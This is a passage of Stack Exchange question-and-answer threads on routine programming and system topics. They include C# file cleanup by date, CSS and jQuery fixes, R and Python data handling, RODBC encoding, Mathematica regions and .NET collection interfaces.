That other question is based on file creation time, and this one is about date-embedded-in-filename.\nAnswer: The following code can be used to get the collection of files having created date less than today's date, A simple iteration over the collection will help you to delete them as well: consider the code\nSimple option:\n<code>foreach (var item in Directory.GetFiles(@\"C:\/\/Documents\", \"*.txt\")\n .Where(x => new FileInfo(x).CreationTime.Date < DateTime.Now.Date))\n{\n File.Delete(item);\n} \n<\/code>\nBased on Filename:\n<code>var fileArray = Directory.GetFiles(@\"C:\/\/Documents\", \"*abc.txt\");\nfor (int i = 0; i < fileArray.Length; i++)\n{\n DateTime fileNameTime;\n string fileName = Path.GetFileNameWithoutExtension(fileArray[i]).Replace(\"_abc\", \" \");\n fileNameTime = DateTime.ParseExact(\"yyyyMMdd_hhmmss\", fileName, CultureInfo.InvariantCulture, DateTimeStyles.None);\n if (fileNameTime.Date < DateTime.Now.Date)\n {\n File.Delete(fileArray[i]);\n }\n}\n<\/code>\n\nPlease note : The best and effective option is the first one, what you need to do is assign the file-name as the dateTime at the time of\n creation of the file(if it is under your control) so that the things\n became easier for you\nComment: Probably want to use CreationTime.Date and DateTime.Now.Date, unless you want to delete all files :)\nComment: @gnalck: thankk you, nice spot. i have updated the answer\nComment: Thanks for the reply :)\ni'm looking for the file name more than the creation time.\nComment: @un-lucky here we are jus comparing if the date is less than todays date. what if i have to check for 5 days older condition? \n\nI tried this:\n\n if (DateTime.Now.Date - d5.Date > TimeSpan.FromDays(5))\n {\n Console.WriteLine(fileArray[i]);\n File.Delete(fileArray[i]);\n }\n\nBut the file is not getting deleted. anything to tweak in here?\nComment: use `DateTime.Now.AddDays(-5).Date` instead for `DateTime.Now`\nAnswer: The filename is already in a sortable format based on the date. Instead of parsing bits of the filename into a DateTime object, why not create a filename based on today's date and filter your array of filenames down to only those that are string-comparison-less than your today's-date filename? It's probably quite a bit faster than doing date parsing on each filename, for large lists of files.\nFor example:\n<code>var path = \"c:\\\\whatever\";\nvar suffix = \"_abc.txt\";\nvar todaysFilename = DateTime.Now.ToString(\"yyyyMMdd_hhmmss\") + suffix;\nvar filesToDelete = Directory.EnumerateFiles(path, \"*\" + suffix)\n .Select(Path.GetFileName)\n .Where(fileName => string.Compare(fileName, todaysFilename, StringComparison.Ordinal) < 0)\n .ToArray();\n\nforeach (var file in filesToDelete)\n{\n File.Delete(Path.Combine(path, file));\n}\n<\/code>\nComment: Thanks for the answer. What if i have to delete files which are 5 days older than today's date? Is it 5 instead of 0 in your code?\nComment: No, the `Compare` function returns a value less than zero when the first argument is less, zero when they're equal, and a value greater than zero when the second argument is less. What you want to do is this: `var todayFilename = DateTime.Now.AddDays(-5).ToString(...)`. 
That would delete all files more than 5 days old.\nAnswer: You could take the name of the string and do a DateTime.ParseExact.\n<code>String dateString = Path.GetFileNameWithoutExtension(fileArray[i])\nDateTime d5 = DateTime.ParseExact(dateString, \"yyyyMMdd\", CultureInfo.InvariantCulture, DateTimeStyles.None)\nif (d5.Date < DateTime.Now.Date)\n{\n File.Delete(fileArray[i]);\n}\n<\/code>\nThis will take the first 8 characters of the string and parse do an exact parse on it.\nAlso you will probably just want the filename without the path and extension.\nhttps:\/\/msdn.microsoft.com\/en-us\/library\/w2sa9yss%28v=vs.110%29.aspx?f=255&MSPPError=-2147217396\nComment: i think u need to tweak your answer a little bit. \n\nDateTime d5 = DateTime.ParseExact(filename,\"yyyyMMdd\", CultureInfo.InvariantCulture, DateTimeStyles.None);\nComment: If the creation date is the date that you want to compare the other answers are probably better, but if the date in the filename is what you want and not the actual creation date then parsing the date from the string is better.\nComment: Hi Arina.. i tried your method. but it is throwing an error.. \n\"String was not recognized as a valid DateTime.\"\n\nAfter getting the filenames i did this.\n\n DateTime d5 = DateTime.ParseExact(\"yyyyMMdd\", fileArray[i], CultureInfo.InvariantCulture, DateTimeStyles.None);\n Console.WriteLine(d5);\nComment: You will probably have to truncate the filename to get it in to the exact format.\nDateTime d5 = DateTime.ParseExact(\"yyyyMMdd\", fileArray[i].SubString(0, 8), CultureInfo.InvariantCulture, DateTimeStyles.None)\nComment: Hi Arina..is there any reference to be added for stringtool? because it shows no potential fixes for the same. TIA\nComment: Sorry, I meant to Substring, was just copy and pasting from some code.\nAnswer: You can get the DateTime a file was created like this\n<code>DateTime time = File.GetCreationTime(fileName);\n<\/code>\nYes it's that easy.\nComment: hi JSON. When i tried this code, why is it showing 1\/1\/1601 8:00:00 AM as the creation date. Is there anything else i need to do\/\nComment: Your fileName is probably not correct. Make sure you include the entire path. If you like my answer mark as answered and thumps me up\n","meta":{"source":"stackoverflow","title":"Delete files which are older than today's date","dup_signals":{}},"subset":"stackexchange"} +{"text":"XOR PSK with random buffer\n\nQuestion: I need some guidance here:\nassuming I have the following:\n(PreSharedKey of 32 bytes) XOR (one time Random Buffer of 32 bytes)\nThe only way to crack this should be brute forcing, correct? One of the issue in sending out the XORed value is to disclose the PSK length. At this point I could add some random bytes at the end of the XORed value to avoid this (the two ends knows the real PSK len). But does it make sense? Or it would be better to just increase the PSK (and the random buffer) length of the same number of bytes to get more security?\nSorry for the newbie question...\nThanks,\nComment: Newbe questions are alright, but I'm not sure we can answer it as it stands. If you XOR something with a fully random value then nothing can be brute forced. Leaking the size of a key is generally not an issue. 32 bytes \/ 256 bits of key material should be plenty to secure anything, so extending it doesn't make sense. 
So all in all, I haven't got an inkling of what you are trying to ask or even protect.\nComment: @MaartenBodewes I think the OP tries to send a 32 bytes random as AES-256 key.\nComment: Well, you can only do that one time, as any key leaking will also expose all the other keys, so you might as well use just one key. And in that case, it might just as well be the pre-shared key itself. So I still don't get it. Of course, brute forcing something that is really an OTP makes no sense.\nAnswer: \nOne of the issue in sending out the XORed value is to disclose the PSK length\n\nThis is only an issue if you consider the length of the PSK to be a secret and not just the value. In that case you probably should redesign your system to not depend on the length of the PSK being secret, e.g. by always sending an upper-length PSK and also sending the amount of bytes used if you need secret variable length.\n\nThe only way to crack this should be brute forcing, correct?\n\nAssuming an adversary only gets to see $K\\oplus B$ with $K$ being your PSK and $B$ being the one-time buffer, this is a one-time pad and an adversary cannot infer anything about the PSK they didn't already know. In particular an adversary cannot infer the concrete value. However this guarantee is void if the same buffer $B$ is used more than once - even with the same key as then the adversary knows the key has been re-used which you may or may not want to leak. And of course note that receiver of this value also has to know $B$ which at this point becomes a one-time-use PSK itself which begs the question why one doesn't use $B$ as the key directly potentially with a more standard symmetric key-exchange protocol to get a fresh session key - which can be as simple as encrypting a monotonic counter and a new key under the PSK.\n","meta":{"source":"crypto.stackexchange","title":"XOR PSK with random buffer","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get the title of a product (Woo-Commerce) to show up in white text\n\nQuestion: I'm new to wordpress, html, and all so I'm learning slowly but surely. Currently while working on a website for my business, the shop page has 6 items listed but none of the titles of the items are listed. Only the picture themselves. The background and text color of the titles are both #222222. I'm trying to change the text color of the title which is <code>h2<\/code>. The name of the header is <code>h2.woocommerce-loop-product_title<\/code> as seen in the inspector. \nNone of the code I've tried has worked so how would I properly reformat the text color?\nhttp:\/\/middlesexworms.com\/index.php\/shop\/\n\nCode I've tried:\n<code>h1,\nh2,\nh3,\nh4,\nh5,\nh6{\n font-family: 'Krub', sans-serif;\n margin:0;\n padding:10px 0;\n color: #FFFFFF;\n font-weight: bold;\n}\n<\/code>\nComment: The code you have tried will override all the heading elements which is not what you would want :)\nAnswer: You need to edit this class:\n<code>h2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\n color: #ffffff;\n letter-spacing: 1px;\n margin-bottom: 10px !important;\n}\n<\/code>\nOld class is :\n<code>h2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\n color: #0000;\n letter-spacing: 1px;\n margin-bottom: 10px !important;\n}\n<\/code>\nSo i change color from <code>#000000<\/code> to <code>#fffffff<\/code>\nComment: He might need to add `!important` based on different situations in WordPress. 
He can try adding a parent element `woocommerce-loop-product__link` to increase the specificity in that case. To override.\nComment: no need to add `!important`, I try in live wwebsite and work good\nAnswer: You can change color by navigating to style.css file of the theme. I hope you can access that file through FTP client. Login to your server using FTP or cPanel go to your webiste setup root then \/wp-content\/themes\/vw-gardening-landscaping\/style.css. Go on line #1272 and change color property to #fff.\nIf you don't have access login to wp-admin navigate to appearance > editor. There you can see the sytle.css change the property on line #1272 to #fff\nI know this is not standard practice to edit theme's core file but if you couldn't enqueue your own stylesheet or not created child theme you have to do this. \nYou can enqueue your own stylesheet setting dependency as theme's style.css and over write the rules as \n<code>h2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\ncolor: #fff !important; }\n<\/code>\nLet me know if you wish further assistance.\nAnswer: Before I saw your answers, i did a ton of googling. Seems as though there are a lot of ways to fix it but this one was what I used:\n<code>h1,\nh2,\nh3,\nh4,\nh5,\nh6{\n font-family: 'Krub', sans-serif;\n margin:0;\n padding:10px 0;\n color: #FFFFFF;\n font-weight: bold;\n}\n\nh2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\n color:#FFFFFF;\n letter-spacing:1px;\n margin-bottom:10px !important;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to get the title of a product (Woo-Commerce) to show up in white text","dup_signals":{}},"subset":"stackexchange"} +{"text":"JavaScript - function is not defined\n\nQuestion: I've been stuck with this for hours now. I think it's time for some new eyes on the code. I'm pretty new to JavaScript so I could have certainly overlooked some detail. I should note that other functions are working properly. \nI'm creating rows in a table dynamically and a few of the cells contain SELECT elements. 
Here is the script (just the portions where I am having trouble):\n<code>case 2:\n newcell.innerHTML = \"<select id='size\" + pid + \"' class='ad_size' \\\n onChange='updateSubtotal()'> \\\n <option value='0'>Full<\/option> \\\n <option value='1'>Half<\/option> \\\n <option value='2'>Quarter<\/option> \\\n <option value='3'>Eighth<\/option> \\\n <option value='4'>Directory<\/option> \\\n <\/select>\";\n break;\n<\/code>\nand the basic function where I am just trying to log whether or not it is being called properly:\n<code>function updateSubtotal() {\n console.log(\"size changed\");\n return true;\n}\n<\/code>\nIt is probably helpful to add that I originally tried doing this with jQuery .change and it was also not working:\n<code>$(\".ad_size\").change(function(){\n console.log(\"size changed\");\n});\n<\/code>\nAny dumb error you can see?\nComment: change console.log to alert and see what happens - I dumped your code into a fresh page and it's happy with an alert\nAnswer: Since you are adding the element dynamically try using <code>delegate<\/code> to attach event handler.\n<code>$('tableSelector').delegate('.ad_size', 'change', function(){\n console.log(\"size changed\");\n});\n<\/code>\nOr use <code>on<\/code> if you are using jQuery 1.7+\n<code>$('tableSelector').on('change', '.ad_size', function(){\n console.log(\"size changed\");\n});\n<\/code>\nComment: .delegate (1.4+) or .on(1.7+) would be the appropriate way to do this with current versions of jQuery.\nAnswer: try:\n<code> $(document).ready(function(){\n $(\".ad_size\").live('change',function(){\n console.log(\"size changed\");\n });\n });\n<\/code>\nComment: `.on` wouldn't make any difference like that.\nComment: wow thank you. .on did not work, but .live worked like a charm.\nComment: .live should not be used with jQuery 1.7+. You should be using .on() with the example shown in the answer by @ShankarSangoli. Not that you should attach this to document, but you can achieve the exact same effect as .live by doing $(document).on(\"change\", \".ad_size\", function() { ... });\n","meta":{"source":"stackoverflow","title":"JavaScript - function is not defined","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to assign list key with value in for loop in R\n\nQuestion: <code>lista = vector(mode = 'list', length =2)\nlistname = c(0.1,0.2)\nnames(lista) = listname\nfor (i in listname){lista[[i]] = i}\n<\/code>\n\nError in lista[[i]] <- i : \n attempt to select less than one element in integerOneIndex\n\nI want to get a list with key = (0.1,0.2) and assign value to those keys in a for loop \nComment: What value do you want to assign to list elements? 
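One small sketch of a way to make the loop itself run, assuming the goal is simply to store each value under its own name: indexing with the raw numeric 0.1 is treated as a position (truncated to 0), which is what triggers the 'less than one element' error, so the index is converted to a character name instead:
<code>lista <- vector(mode = "list", length = 2)
listname <- c(0.1, 0.2)
names(lista) <- listname            # names are stored as "0.1" and "0.2"

for (i in listname) {
  lista[[as.character(i)]] <- i     # index by name, not by numeric position
}

lista
#> $`0.1`
#> [1] 0.1
#>
#> $`0.2`
#> [1] 0.2
<\/code>
This reuses the names already assigned in the question and keeps the loop structure unchanged.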
Can you show your expected output?\nComment: Try `for (i in 1:length(listname)){lista[[i]] = i}`\nAnswer: I agree with @RonakShah's comment in that it's not very clear what you're trying to do.\nI assume that\n\nyou have a <code>list<\/code> (called <code>lista<\/code>) with a k <code>NULL<\/code> elements, and\nyou have a <code>numeric<\/code> vector (called <code>listname<\/code>) with k elements.\n\nI further assume that you're trying to (1) name every <code>lista<\/code> element with names given in <code>listname<\/code>, and (2) replace every <code>NULL<\/code> element with the corresponding entry from <code>listname<\/code>.\nYou can do this in one step using <code>Map<\/code> and <code>setNames<\/code>:\n<code>setNames(Map(c, lista, listname), listname)\n#$`0.1`\n#[1] 0.1\n#\n#$`0.2`\n#[1] 0.2\n<\/code>\n\nSample data\n<code>lista <- vector(mode = \"list\", length = 2)\nlistname <- c(0.1, 0.2)\n<\/code>\nComment: Awesome! this is exactly what I was trying to achieve!\nComment: You're very welcome @Amy. Since you're new around here, please consider closing the question by setting the green check mark next to the answer. That way you help keeping SO tidy and make it easier for others to identify relevant posts. It also provides a small reputation bonus to both the question poster and answerer. Thanks and welcome to Stack Overflow!\nComment: Done. Thanks for the orientation.\n","meta":{"source":"stackoverflow","title":"How to assign list key with value in for loop in R","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is the property of an inner div not being applied?\n\nQuestion: I'm very new to web-dev, so please bear with me. I am using Jekyll to generate my webpage. So I created some custom classes, and specified the <code>css<\/code> properties in the corresponding <code>_sass<\/code> file.\nThe following are the two classes which are relevant to the question:\n<code>.quote{\n width: 100%;\n margin: auto;\n text-align: center;\n background-color: #171717;\n font-size: 25px;\n padding: 10px;\n\n &.author{\n width: 50%;\n float: right;\n font-size: 20px;\n color: red;\n padding: 10px;\n }\n }\n<\/code>\nThis is the css code generated by <code>Jekyll<\/code>:\n<code>section .quote { width: 100%; margin: auto; text-align: center; background-color: #171717; font-size: 25px; padding: 10px; }\n\nsection .quote.author { width: 50%; float: right; font-size: 20px; color: red; padding: 10px; }\n<\/code>\nThe following is the relevant HTML code:\n<code><div class=\"quote\">\n\n <div id=\"randomquote\">\n Hello there, this is supposed to show a quote.\n <\/div>\n\n <div class=\"author\">\n This should be the author's name.\n <\/div>\n\n<\/div>\n<\/code>\nHowever, the properties of <code>author<\/code> class are not applied to the inner div. Rather it has the properties corresponding to <code>quote<\/code>. Why is that? Am I missing something? \nPlease note that I intend to use <code>author<\/code> inside <code>quote<\/code>. \nAnswer: Add a space between your <code>&<\/code> and <code>.author<\/code> in CSS. 
See here:\nhttps:\/\/jsfiddle.net\/y4j6ua1r\/1\/\nAlso in your generated code, there should be a space between <code>.quote<\/code> and .<code>author<\/code> See here:\nhttps:\/\/jsfiddle.net\/y4j6ua1r\/2\/\n","meta":{"source":"stackoverflow","title":"Why is the property of an inner div not being applied?","dup_signals":{}},"subset":"stackexchange"} +{"text":"String with accents in MySQL table returned as NA in R (RODBC)\n\nQuestion: I have a table called 'segments' stored in a MySQL database. The table is UTF-8 encoded (charset utf8, collation utf8_general_ci), and the column 'label' contains strings with accents, like \"Fid\u00e8les\", \"Arr\u00eat\u00e9s\", etc.\nI query that table using R, and the RODBC package, with a simple:\n<code>data = sqlQuery(channel = myodbcconnection, query = \"SELECT label FROM segments\")\n<\/code>\nDoing so will result in all strings containing accents being replaced with NA values. It's not only the accents being replaced by filling characters. The entire string becomes NA.\n\nRunning the query from MySQL Workbench returns the correct strings, so the table is fine\nR files are utf-8 encoded, sourced with utf-8 encoding, etc.\nThe ODBC connection uses a MySQL ODBC UNICODE Driver\n\nWhat's even weirded is that if I run an UPDATE on the database from R, with something like:\n<code>sqlQuery(channel = myodbcconnection, query = \"UPDATE segments SET label = 'Test\u00e9 et approuv\u00e9' WHERE id = 70\")\n<\/code>\nThe database is updated correctly. But if I select it back, it returns an NA value.\nThis is driving me crazy. ;-) Any help would be greatly appreciated.\nComment: I tried will all combinations of `as.is` and `stringAsFactors` (just in case), to no avail.\nComment: I should also add that when I create my ODBC connection with `odbcConnect`, I specify `DBMSencoding = \"UTF-8\"`\nAnswer: After much pain, I found a partial answer to my own question.\nThe problem was, as expected, with the ODBC connection, and the way it coded utf8 communications. In the ODBC connection string, you have to specify CharSet=utf8. For instance:\nDriver={MySQL ODBC 3.51 Driver};Server=localhost;Database=myDataBase;\nUser=myUsername;Password=myPassword;Option=3;CharSet=utf8;\nNote that:\n\nIt is not enough to select the ODBC Unicode (utf8-compatible) driver.\nSpecifying \"DBMSencoding\" as utf8 in the odbcConnect function was not sufficient either.\nThis fixed the issue on my localhost, but not in my production environment (Ubuntu\/AWS), for unknown reason.\n","meta":{"source":"stackoverflow","title":"String with accents in MySQL table returned as NA in R (RODBC)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error message at startup\n\nQuestion: I just installed Ubuntu on my Gateway NE56R41u yesterday. Infact, it dual-boots with Windows 8.1 UEFI, but that has nothing to do with my problem. However, when I turn on my computer, I get an error message that displays for about a second. I don't know what it means, though and it displays for less than a second. Tell me, does it mean anything important? How do I fix it? Also, regardless of if it's important or not or if it is fixable, how can I prevent the message from displaying when I turn my computer on? The error is below:\n<code>[10.987] info @wl_cfg80211_attach CFG80211 Phy\n<\/code>\nAnswer: Overall, that is just a report that it issues while it hasn't loaded the boot screen, if you press any of the f(#) buttons you will see the boot log, and you will see a lot more of those. 
It is not an error, it is just a report in the log that it successfully loaded a particular sector\/file. There really is no way to remove it, as it is just what is in the background while the system boots\nComment: sorry it is impossible to remove, I generally just like it. I disable \"quiet boot\" in the grub boot option so it displays the whole log, that way if I DO get an error I can see it, plus it gives me a sense of nostalgia having text fly by me on a computer screen :P\nComment: I get that too (http:\/\/askubuntu.com\/questions\/431339\/12-04-info-message-on-black-screen-during-boot-wifi-works-fine) it has something to do with the wireless adapter. Have not found a way to get rid of it yet.\nComment: as I said, though, it is just a report that it found it, not really something you can remove safely because the log is there for a LOT of diagnostic purposes, and really shouldn't be hidden or removed permanently\n","meta":{"source":"askubuntu","title":"Error message at startup","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I check if a string given is a real word?\n\nQuestion: I am making a program that solves anagrams in Visual Basic. How can I check if a string given by the anagram solver is a real word? I know I will have to access some sort of dictionary but I have no idea how to do this?\nI need a function that checks the word to return a true\/false boolean value. Is this possible?\nI'm using Visual Basic in Microsoft's VS2015.\nComment: Of course this is possible, but given you haven't said what you've tried so far, or even what format the dictionary will be in, it will be difficult to help you.\nComment: @Carcigenicate So far I've got the code that generates the random string of letters (see below) however I have no idea how dictionaries work in Visual Basic and so that's what I'm also asking for help in. What format would you recommend?\nComment: `Dim lettersgiven() As Char = {\"a\"c, \"b\"c, \"d\"c, \"e\"c, \"f\"c}\nDim results As New List(Of String)\nFor start As Integer = 0 To lettersgiven.Length - 1\nDim usedindices As New List(Of Integer)\nFor j As Integer = 1 To lettersgiven.Length\nDim i As Integer = start\nWhile usedindices.Contains(i)\n i = (i + 1) Mod lettersgiven.Length\nEnd While\nusedindices.Add(i)\nNext\nDim sb As New System.Text.StringBuilder()\nFor Each i As Integer In usedindices\nsb.Append(lettersgiven(i))\nNext\nIf LookupDictionary(sb.ToString()) Then results.Add(sb.ToString())\nNext`\nComment: Have you thought of making requests to some free dictionary API's?\nComment: http:\/\/stackoverflow.com\/q\/2213607\/1043824 gives a file with lots of words. You can search through it to check for existance. Searching is tough in flat files. You may want to put it in a database and sql search it. Hitting an api is a neat idea, but i guess it is over the high water mark.\nComment: @gdrt94 thanks for your answer. I'll try that out and get back to you.\nComment: @inquisitive thank you!\nComment: Check http:\/\/www.dictionaryapi.com\/products\/api-collegiate-dictionary.htm\nComment: One solution is to check your word has no spaces first then use one of the myriads of spell checking examples. If it comes back as an error...it is not a real word. However, spell checking is not that easy either for a newb.\nComment: Btw if you are using WPF the spell check part is easy. 
If you are using windows forms I suggest you create and use a WPF control on your form.\nAnswer: Hunspell is pretty easy to use.\n\nInstall the .net-library through Nuget (open your project in Visual Studio, then > Extras > Nuget-Package-Manager -> Console, type <code>Install-Package NHunspell<\/code>)\nDownload the .aiff and .dic files, see the dictionaries link on the Hunspell project page. Include these files in your project or use absolute paths.\n\nSample Code:\n<code>Private Sub TextBox1_TextChanged(sender As Object, e As EventArgs) Handles TextBox1.TextChanged\n Using h As New NHunspell.Hunspell(\n \"...path ...\\en_US.aff\",\n \"...path ...\\en_US.dic\")\n Me.TextBox1.BackColor = If(h.Spell(Me.TextBox1.Text),\n Color.PaleGreen, Color.PeachPuff)\n End Using\nEnd Sub\n<\/code>\nHunspell \n.net library NHunspell \nNHunspell C# Code Samples\nAnswer: If your are using WPF then checking if a word in a textbox can be done simply by checking if it has a spelling error.\n<code>Public Function WordOk(Word As String) As Boolean\n return TextBox1.GetNextSpellingErrorCharacterIndex(0, Windows.Documents.LogicalDirection.Forward) < 0 \nEnd Function\n<\/code>\nIf you are using windows forms then you can create a \"User Control (WPF)\" to do the same thing, though it is a bit tricky to explain how to do that here.\n(There may be a better test than the one I showed though.. I'm not overly familiar with WPF)\n","meta":{"source":"stackoverflow","title":"How can I check if a string given is a real word?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to connect to wifi on 16.04\n\nQuestion: About a week ago, I upgraded to 16.04 and ever since then, my computer doesn't seem to connect to wifi. I have Windows 10 on another partition, and that connects just fine. LAN connects fine too.\nHere's what shows under Network - No Wifi option! When I do <code>nm-tool<\/code>, it says \n<code>No command 'nm-tool' found, did you mean:\n Command 'dm-tool' from package 'lightdm' (main)\nnm-tool: command not found\n<\/code>\nI try tethering from my phone, that doesn't work too. FYI, it worked like a charm before the update!\nPlease, can you help me?!\nAnswer: Try nmtui \nnmtui \u2014 Text User Interface for controlling NetworkManager\nnmtui [edit | connect | hostname] [...] \nnmtui-edit [connection-id | connection-name] \nnmtui-connect [connection-name | connection-uuid | device-name | Wi-Fi-SSID] \nnmtui-hostname\nComment: Ok, what am I supposed to be looking at in this? Anything in particular? The options it gives me are pretty much the same as the regular UI (under System Settings)\nComment: Any help, anyone?\n","meta":{"source":"askubuntu","title":"Unable to connect to wifi on 16.04","dup_signals":{}},"subset":"stackexchange"} +{"text":"best way to index by value of the header in a 2d list\n\nQuestion: This solution sort of works but is extremely ugly:\nFinding the index of an item given a list containing it in Python\n<code>rowIndex = 3\nsheet = list(csv.reader(open('ObserverLog.csv'))) \nprint sheet[rowIndex][sheet[0].index(\"Message sent? (Y\/N)\")] \n<\/code>\nIt seems like there ought to be a way to make it work like this:\n<code>print sheet[rowIndex][\"Message sent? (Y\/N)\"] \n<\/code>\nAnswer: <code>DictReader<\/code> will read each row as a dictionary:\n<code>list(csv.DictReader(open('ObserverLog.csv')))\n<\/code>\nReturns a list of dictionary, so\n<code>sheet[rowIndex][\"Message sent? (Y\/N)\"] \n<\/code>\nwould work.\nComment: This works well enough. 
not totally what I wanted but it is exactly what I asked for. haha. An unanticipated consequence of this is I can't reference by index anymore. but that's OK.\nComment: @gnarbarian Well if you really want to have all the power you can try using pandas, which is great :-)\n","meta":{"source":"stackoverflow","title":"best way to index by value of the header in a 2d list","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get a membership condition for RegionBoundary using RegionMember\n\nQuestion: This is my first question on this forum, but by no means my first problem with Mathematica (which I've been using daily for years).\nConsider\n<code>Clear[x, y]\nreg = RegionBoundary[ImplicitRegion[0 < x < 2 \\[And] 0 < y < -2 x + 4, {x, y}]];\n<\/code>\nIn Mathematica 10.3, the expression\n<code>RegionMember[reg, {x, y}]\n<\/code>\nevaluates to the following logical condition\n<code>(x | y) \\[Element] Reals && ((x == 0 && \n 0 <= y <= 4) || (0 < x < 2 && (y == 0 || y == 4 - 2 x)) || (x == \n 2 && y == 0))\n<\/code>\nwhich is correct. However, since version 12 (at least) the result is not a symbolic condition anymore, but a RegionMemberFunction expression.\nHow can one get the predicate above or something equivalent?\nComment: `CylindricalDecomposition[0<x<2&&0<y<-2 x+4,{x,y},\"Boundary\"]\/\/Simplify`\nComment: RegionMember gives logical condition for implicit regions, so I thought to try RegionConvert[reg,\"Implicit\"]. But that doesn't evaluate. Alternatively, first converting to mesh with Chop[RegionConvert[DiscretizeRegion[reg], \"Implicit\"]] gives the full region, not the boundary.\nComment: @chyanog Consider making your comment into an answer\nComment: I don't even get a `RegionMemberFunction` in MMA 12.0, I just get the expression returned unevaluated.\nAnswer: <code>cond = CylindricalDecomposition[0 < x < 2 && 0 < y < -2 x + 4, {x, y}, \"Boundary\"\n ] \/\/ Simplify\n<\/code>\n\n(x == 0 && y >= 0 && 2 x + y <= 4) || (0 <= x && ((y == 0 && x <= 2) || (2 x + y == 4 && x < 2)))\n\n<code>RegionPlot[ImplicitRegion[cond, {x, y}], Frame -> False]\n<\/code>\nComment: chyanog, thank you very much for the answer, especially for bringing attention to CylindricalDecomposition and its topological powers acquired in version 11.2 (which I had forgotten about!).\nComment: @GregosTroianosEducacional It's my pleasure.\n","meta":{"source":"mathematica.stackexchange","title":"How to get a membership condition for RegionBoundary using RegionMember","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why use ICollection and not IEnumerable or List on many-many\/one-many relationships?\n\nQuestion: I see this a lot in tutorials, with navigation properties as <code>ICollection<T><\/code>.\nIs this a mandatory requirement for Entity Framework? Can I use <code>IEnumerable<\/code>?\nWhat's the main purpose of using <code>ICollection<\/code> instead of <code>IEnumerable<\/code> or even <code>List<T><\/code>?\nComment: So the answer is, it is NOT mandatory to use ICollection. and I can use IEnumerable if iteration is al I want. right?\nAnswer: Usually what you choose will depend on which methods you need access to. 
In general - <code>IEnumerable<><\/code> (MSDN: http:\/\/msdn.microsoft.com\/en-us\/library\/system.collections.ienumerable.aspx) for a list of objects that only needs to be iterated through, <code>ICollection<><\/code> (MSDN: http:\/\/msdn.microsoft.com\/en-us\/library\/92t2ye13.aspx) for a list of objects that needs to be iterated through and modified, <code>List<><\/code> for a list of objects that needs to be iterated through, modified, sorted, etc (See here for a full list: http:\/\/msdn.microsoft.com\/en-us\/library\/6sh2ey19.aspx).\nFrom a more specific standpoint, lazy loading comes in to play with choosing the type. By default, navigation properties in Entity Framework come with change tracking and are proxies. In order for the dynamic proxy to be created as a navigation property, the virtual type must implement <code>ICollection<\/code>.\n\nA navigation property that represents the \"many\" end of a relationship must return a type that implements ICollection, where T is the type of the object at the other end of the relationship. -Requirements for Creating POCO ProxiesMSDN\n\nMore information on Defining and Managing RelationshipsMSDN\nComment: @TravisJ: `List` has a `GetEnumerator()` method, separate from its implementation of `IEnumerable`, which returns a mutable structure type `List.Enumerator`. In most contexts, that type will yield slightly better performance than would a standalone heap object. Compilers which duck-type enumerators (as both C# and vb.net do) can take advantage of this when generating `foreach` code. If the `List` is cast to `IEnumrable` before the `foreach`, the `IEnumerable.GetEnumerator()` method will return a heap-allocated object, rendering the optimization impossible.\nComment: so, with that, `List` should be a lot better, yeah?\nComment: @JanCarloViray - I tend to use `List` a lot. Although it has the most overhead it provides the most functionality.\nComment: With regard to your edit, restricting a property to an interface type is not about memory but about encapsulation. Consider: `private IEnumerable _integers = new List { 1, 2, 3 };` uses the same memory as `private List _integers = new List { 1, 2, 3 };`\nComment: Lists are defined more by their indexers than by the ability to sort them (having an integer indexer makes it easy to sort something, but it's not a requirement).\nComment: @phoog - Yes, they are available to be indexed through `ListName[i]` which can be very handy. The sort is built in.\nComment: The sort is built in to the `List` type, true, but that's more of an \"extra\". For example, the `IList` interface doesn't have a `Sort()` method.\nComment: @phoog - I am going to have to disagree with you there. Your example is flawed in that you are wrapping a `List` with an `IEnumberable` which is rather pointless. Just leave it as a List, you already took the hit! The point I was making of a small footprint in memory is that most `IEnumberable` implement a deferred execution (your example just explicitly makes that execution to be at the time of definition).\nComment: @TravisJ I am not wrapping a list in an IEnumerable, I am *referencing* a list *as* an IEnumerable. Replace `IEnumerable` in my example with `ICollection` (which means we're no longer confused by the possibility of using linq queries). How does that use any less memory than `List`?\nComment: @phoog - I am not sure there is much difference between Collection and List. However, I believe there is a difference between those two and IEnumerable. 
This difference lies in the iterator. In the more complex collections (List and Collection) I believe they use a reference type whereas IEnumberable uses a mutable struct (to increase performance).\nComment: let us [continue this discussion in chat](http:\/\/chat.stackoverflow.com\/rooms\/9977\/discussion-between-phoog-and-travis-j)\nComment: `IEnumarable` is **not thread safe** either so by using it next to async methods is somekind of violation on it its own. The problem is that every thread that iterates on IEnumarable executes the backing query and if the context is closed on the main thread, and already enumerated object in another thread, fails to enumerate in this thread. ICollection holds your nongeneric data enumerated, so after Linq-to-SQL has executed there is no point in passing IEnumarble up the Layers any more. IMHO\nAnswer: <code>ICollection<T><\/code> is used because the <code>IEnumerable<T><\/code> interface provides no way of adding items, removing items, or otherwise modifying the collection.\nComment: `List` implements `ICollection`.\nComment: what about comparing against List?\nComment: The non-generic `ICollection` doesn't allow any way to add items, but it's still a useful adjunct to `IEnumerable` because it provides a `Count` member which is typically much faster than enumerating everything. Note that if an `IList` or `ICollection` is passed to code expecting an `IEnumerable`, the `Count()` extension method will be fast if it implements the non-generic `ICollection`, but not if it only implements the generic interfaces since a typical `ICollection` will not implement `ICollection`.\nAnswer: Responding to your question about <code>List<T><\/code>:\n<code>List<T><\/code> is a class; specifying an interface allows more flexibility of implementation. A better question is \"why not <code>IList<T><\/code>?\"\nTo answer that question, consider what <code>IList<T><\/code> adds to <code>ICollection<T><\/code>: integer indexing, which means the items have some arbitrary order, and can be retrieved by reference to that order. This is probably not meaningful in most cases, since items probably need to be ordered differently in different contexts.\nAnswer: There are some basics difference between ICollection and IEnumerable\n\nIEnumerable - contains only GetEnumerator method to get Enumerator and allows looping\nICollection contains additional methods: Add, Remove, Contains, Count, CopyTo\nICollection is inherited from IEnumerable\nWith 